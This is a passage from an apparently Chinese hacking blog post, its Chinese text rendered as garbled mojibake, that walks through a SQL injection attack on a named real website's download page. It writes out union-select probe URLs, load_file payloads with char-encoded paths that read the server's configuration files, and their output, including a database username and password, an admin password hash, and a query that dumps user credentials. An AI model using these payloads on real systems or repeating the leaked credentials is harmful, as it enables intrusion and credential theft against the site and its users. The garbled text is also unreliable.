˵Ã÷һϣ¬load_fileĬÈÏËùÔÚµÄĿ¼ÊÇmysqlϵÄdataĿ¼£¬ËùÒÔÎÒÃÇÓà ½á¹ûÈçͼ34 ÎÒÃÇ¿´¶Á³öÀ´µÄÄÚÈÝ Å|ÿÿ? admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin question admin answer http://www.yoursite.com (?ì[?ûûKAì[?ì[? 127.0.0.1 d|?ÿ? aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com sdfasdfsdfa asdfadfasd ?EüKAMüKA 127.0.0.1 222 222222223423
ËäÈ»ÂÒÂëÒ»¶Ñ£¬µ«ÊÇÎÒÃÇ»¹ÊÇ¿ÉÒÔ¿´³öÓû§ÃûÊÇadmin£¬ÃÜÂëÊÇ698d51a19d8a121ce581499d7b701668£¬ºóÃæÆäËüµÄÊÇÁíÍâµÄÐÅÏ¢¡£ ˵ÁËÕâô¶àÏÂÃæÎÒÃÇÀ´¾ßÌåµÄʹÓÃÒ»´Î£¬Õâ´Î²âÊԵĶÔÏóÊǹúÄÚÒ»ÖøÃû°²È«ÀàÕ¾µã¨D¨DºÚ°×ÍøÂç Õý³£ÏÔʾ¡£ ÏÔʾ²»Õý³£¡£ ºÃ£¬ÎÒÃǼÌÐø http://www.heibai.net/down/show.php?id=5403%20and%201=1 union select 1
ÏÔʾ½á¹ûÈçÏ עÒ⿴ͼÖÐûÓÐÏÔʾ³ÌÐòÃû£¬¶øÇÒ»¹¸½´øÁË Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\show.php on line 45
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\global.php on line 578 ÔÎÁË£¬ÍøÕ¾Â·¾¶³öÀ´ÁË£¬ÄǿɾÍËÀ¶¨ÁËŶ£¡ http://www.heibai.net/down/show.php?id=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
µÄʱºòÕý³£ÏÔʾÁË¡£ ºÃÎÒÃÇת»»Óï¾ä³ÉΪ http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
ÏÔʾÈçͼ39 ¿´¿´¼ò½é´¦ÏÔʾΪ12£¬ÎÒÃÇ¿ÉÒԲ²â´Ë´¦Ó¦¸ÃΪ×Ö·ûÐÍ£¡ D:/web/heibai/down/show.phpת»¯³ÉasciiºóΪ
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112) ÎÒÃÇ view-source:http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)),13,14,15,16,17,18,19
view-source:ÊÇÖ¸²ì¿´Ô´´úÂ룬ÖÁÓÚΪʲôÓã¬ÎÒÃǺóÃæ½«½²µ½ ÒòΪÔÚshow.phpÖÐÓÐÒ»¾ä (100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
ÎÒÃÇÊäÈë http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19
ÏÔʾ½á¹ûÈçͼ41 ÀïÃæÄÚÈÝÖ÷ÒªÓÐ ¡¡¡¡¡¡¡..
ymDown (ҹèÏÂÔØÏµÍ³) ÊÇÒ»¸öÓ¦ÓÃÓÚÍøÕ¾ÌṩÏÂÔØ·þÎñµÄµÄ³ÌÐò // ------------------------- -------- ------------------------- // // ³£¹æÉèÖà // // ------------------------- -------- ------------------------- // // Êý¾Ý¿âÐÅÏ¢ $dbhost = "localhost"; // Êý¾Ý¿âÖ÷»úÃû $dbuser = "download";// Êý¾Ý¿âÓû§Ãû $dbpasswd = "kunstar988"; // Êý¾Ý¿âÃÜÂë $dbname = "download"; // Êý¾Ý¿âÃû // Cookie Ãû³Æ $cookie_name = "heibai"; // °æ±¾ºÅ $version = "1.0.1"; // Êý¾Ý±íÃû $down_table = ymdown; $down_user_table = ymdown_user; $down_sort1_table = ymdown_sort1; $down_sort2_table = ymdown_sort2; ÔÎÔÀ´ÓõÄÊÇҹèµÄÏÂÔØÏµÍ³£¬¶øÇÒÎÒÃÇÖªµÀÁË $dbuser = "download";// Êý¾Ý¿âÓû§Ãû $dbpasswd = "kunstar988"; // Êý¾Ý¿âÃÜÂë ˵²»¶¨´ô»áÓÐÓÃŶ¡£ http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,username,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from ymdown_user
½á¹ûÈçͼ42 ¸ù¾ÝÌáʾÎÒÃÇÖªµÀÎļþ´óС´¦µÄÊÇusername£¬Ó¦ÓÃÆ½Ì¨´¦µÄÊÇpassword£¨¶ÔÕÕͼ36£© (100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)
ÎÒÃÇÊäÈë http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)),13,14,15,16,17,18,19
½á¹ûÈçͼ43£º ÆäÖÐ (100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
ÊäÈë http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19
½á¹ûÈçͼ44 ÏÔʾÁ˺ܶàºÃ¶«Î÷Ŷ $dbhost = "localhost"; // Êý¾Ý¿âÖ÷»úÃû char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100)
ÎÒÃÇÊäÈë http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100)),13,14,15,16,17,18,19
½á¹ûÈçͼ45£º ÔÎÁË£¬¾¹È»Ã»Óзµ»Ø¡£ÎÒÃÇÀ´¶ÁArticle/user.frm http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,102,114,109)),13,14,15,16,17,18,19
½á¹ûÈçͼ46 ÔÎÁË£¬±í½á¹¹¶¼ÔÚ£¬¶øÇÒ¶ÁArticle/user.myiʱҲ³É¹¦£¬¿ÉÊÇΪʲôArticle/user.myd¶Á²»³öÀ´ÄØ?ÒªÊÇmagic_quotes_gpc£½OffÎÒÃÇ»¹¿ÉÒÔinto outfileÀ´¿´¿´£¬¿ÉÊÇ¡¡ |



virus
²©¿Íͳ¼ÆÐÅÏ¢
ÈÈÃÅÎÄÕÂ
×îÐÂÆÀÂÛ
ÓÑÇéÁ´½Ó